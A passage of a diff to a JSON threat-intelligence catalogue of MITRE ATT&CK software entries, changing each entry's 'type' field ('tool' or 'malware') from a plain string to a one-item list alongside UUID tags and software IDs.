] }, "related": [ { @@ -17316,7 +18270,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17356,7 +18312,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17396,7 +18354,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17437,7 +18397,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17534,7 +18496,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17575,7 +18539,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17636,7 +18602,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17677,7 +18645,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17717,7 +18687,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17740,7 +18712,9 @@ ], "software_attack_id": "S0233", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -17769,7 +18743,9 @@ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", "e81ba503-60b0-4b64-8f20-ef93e7783796" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17791,7 +18767,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -17814,7 +18792,9 @@ ], "software_attack_id": "S0228", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -17841,7 +18821,9 @@ "4d767e87-4cf6-438a-927a-43d2d0beaab7", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -17879,7 +18861,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -17905,7 +18889,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -17930,7 +18916,9 @@ ], "software_attack_id": "S0590", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -17978,7 +18966,9 @@ "meta": { "software_attack_id": "S0102", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -18001,7 +18991,9 @@ ], "software_attack_id": "S0272", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18024,7 +19016,9 @@ ], "software_attack_id": "S0630", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18050,7 +19044,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18073,7 +19069,9 @@ ], "software_attack_id": "S0210", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18119,7 +19117,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -18284,7 +19284,9 @@ ], "software_attack_id": "S0056", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18314,7 +19316,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18362,7 +19366,9 @@ "84615fe0-c2a5-4e07-8957-78ebc29b4635", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -18430,7 +19436,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -18492,7 +19500,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18557,7 +19567,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18589,7 +19601,9 @@ "tags": [ "6c6c0125-9631-4c2c-90ab-cfef374d5198" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18637,7 +19651,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -18702,7 +19718,9 @@ ], "software_attack_id": "S0118", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18729,7 +19747,9 @@ ], "software_attack_id": "S1090", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18798,7 +19818,9 @@ "16b47583-1c54-431f-9f09-759df7b5ddb7", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -18863,7 +19885,9 @@ "cd1b5d44-226e-4405-8985-800492cf2865", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -18933,7 +19957,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -18971,7 +19997,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19071,7 +20099,9 @@ "7e7b0c67-bb85-4996-a289-da0e792d7172", "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19135,7 +20165,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -19181,7 +20213,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -19231,7 +20265,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19254,7 +20290,9 @@ ], "software_attack_id": "S0346", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19273,7 +20311,9 @@ ], "software_attack_id": "S0340", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19318,7 +20358,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -19362,7 +20404,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -19384,7 +20428,9 @@ "tags": [ "8bf128ad-288b-41bc-904f-093f4fdde745" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19424,7 +20470,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19454,7 +20502,9 @@ "tags": [ "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19499,7 +20549,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -19521,7 +20573,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19547,7 +20601,9 @@ "tags": [ "8bf128ad-288b-41bc-904f-093f4fdde745" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19592,7 +20648,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -19628,7 +20686,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19655,7 +20715,9 @@ ], "software_attack_id": "S0165", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19695,7 +20757,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19750,7 +20814,9 @@ ], "software_attack_id": "S0402", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19777,7 +20843,9 @@ ], "software_attack_id": "S0594", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -19804,7 +20872,9 @@ "8bf128ad-288b-41bc-904f-093f4fdde745", "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19827,7 +20897,9 @@ ], "software_attack_id": "S0072", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19874,7 +20946,9 @@ ], "software_attack_id": "S0016", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19929,7 +21003,9 @@ ], "software_attack_id": "S0626", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -19965,7 +21041,9 @@ "2e5f6e4a-4579-46f7-9997-6923180815dd", "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -19991,7 +21069,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20014,7 +21094,9 @@ ], "software_attack_id": "S0208", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20034,7 +21116,9 @@ "meta": { "software_attack_id": "S0122", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20068,7 +21152,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20105,7 +21191,9 @@ "tags": [ "311abf64-a9cc-4c6a-b778-32c5df5658be" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20136,7 +21224,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20181,7 +21271,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20211,7 +21303,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20233,7 +21327,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20274,7 +21370,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20315,7 +21413,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20339,7 +21439,9 @@ "4fa6f8e1-b0d5-4169-8038-33e355c08bde", "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20390,7 +21492,9 @@ ], "software_attack_id": "S0587", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20421,7 +21525,9 @@ ], "software_attack_id": "S0643", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20465,7 +21571,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20487,7 +21595,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20515,7 +21625,9 @@ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20537,7 +21649,9 @@ "tags": [ "6c6c0125-9631-4c2c-90ab-cfef374d5198" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20563,7 +21677,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20587,7 +21703,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20660,7 +21778,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20690,7 +21810,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20713,7 +21835,9 @@ ], "software_attack_id": "S0501", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20736,7 +21860,9 @@ ], "software_attack_id": "S0124", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20780,7 +21906,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20799,7 +21927,9 @@ ], "software_attack_id": "S0254", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20822,7 +21952,9 @@ ], "software_attack_id": "S0435", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -20874,7 +22006,9 @@ "15b77e5c-2285-434d-9719-73c14beba8bd", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -20992,7 +22126,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21087,7 +22223,9 @@ ], "software_attack_id": "S0067", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21132,7 +22270,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -21151,7 +22291,9 @@ ], "software_attack_id": "S0428", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21215,7 +22357,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21305,7 +22449,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21331,7 +22477,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21350,7 +22498,9 @@ ], "software_attack_id": "S0216", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21378,7 +22528,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -21408,7 +22560,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21434,7 +22588,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21457,7 +22613,9 @@ ], "software_attack_id": "S1012", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21477,7 +22635,9 @@ "meta": { "software_attack_id": "S0177", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21517,7 +22677,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -21539,7 +22701,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21562,7 +22726,9 @@ ], "software_attack_id": "S0441", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21602,7 +22768,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21633,7 +22801,9 @@ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", "e81ba503-60b0-4b64-8f20-ef93e7783796" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -21699,7 +22869,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21739,7 +22911,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21766,7 +22940,9 @@ ], "software_attack_id": "S0371", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21800,7 +22976,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -21826,7 +23004,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21852,7 +23032,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21897,7 +23079,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -21920,7 +23104,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21946,7 +23132,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -21987,7 +23175,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22028,7 +23218,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22076,7 +23268,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22110,7 +23304,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22133,7 +23329,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -22174,7 +23372,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22193,7 +23393,9 @@ ], "software_attack_id": "S0279", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -22234,7 +23436,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22253,7 +23457,9 @@ ], "software_attack_id": "S0238", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -22276,7 +23482,9 @@ ], "software_attack_id": "S0613", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -22307,7 +23515,9 @@ "15b77e5c-2285-434d-9719-73c14beba8bd", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22504,7 +23714,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22523,7 +23735,9 @@ ], "software_attack_id": "S0078", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -22563,7 +23777,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -22612,7 +23828,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22641,7 +23859,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22677,7 +23897,9 @@ "tags": [ "6c6c0125-9631-4c2c-90ab-cfef374d5198" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -22721,7 +23943,9 @@ "tags": [ "6c6c0125-9631-4c2c-90ab-cfef374d5198" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -22751,7 +23975,9 @@ ], "software_attack_id": "S0192", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22783,7 +24009,9 @@ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", "15787198-6c8b-4f79-bf50-258d55072fee" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22809,7 +24037,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -22855,7 +24085,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -22896,7 +24128,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -22965,7 +24199,9 @@ "e096f0dd-fa2c-4771-8270-128c97c09f5b", "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23007,7 +24243,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23047,7 +24285,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -23104,7 +24344,9 @@ ], "software_attack_id": "S1076", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23130,7 +24372,9 @@ "tags": [ "33d35d5e-f0cf-4c66-9be3-a3ffe6610b1a" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23156,7 +24400,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23205,7 +24451,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -23237,7 +24485,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23262,7 +24512,9 @@ "a2e000da-8181-4327-bacd-32013dbd3654", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23288,7 +24540,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23311,7 +24565,9 @@ ], "software_attack_id": "S0629", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23334,7 +24590,9 @@ ], "software_attack_id": "S0458", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23356,7 +24614,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23400,7 +24660,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -23425,7 +24687,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [], "uuid": "dc0dbd15-0916-43c7-a3b9-6dc3ce0771be", @@ -23439,7 +24703,9 @@ ], "software_attack_id": "S0241", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23462,7 +24728,9 @@ ], "software_attack_id": "S0364", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -23527,7 +24795,9 @@ ], "software_attack_id": "S0169", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23576,7 +24846,9 @@ "8bf128ad-288b-41bc-904f-093f4fdde745", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -23614,7 +24886,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23662,7 +24936,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -23684,7 +24960,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23710,7 +24988,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23739,7 +25019,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -23780,7 +25062,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -23799,7 +25083,9 @@ ], "software_attack_id": "S0172", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -23832,7 +25118,9 @@ ], "software_attack_id": "S0153", "source": "MITRE", - "type": "malware" + "type": [ + 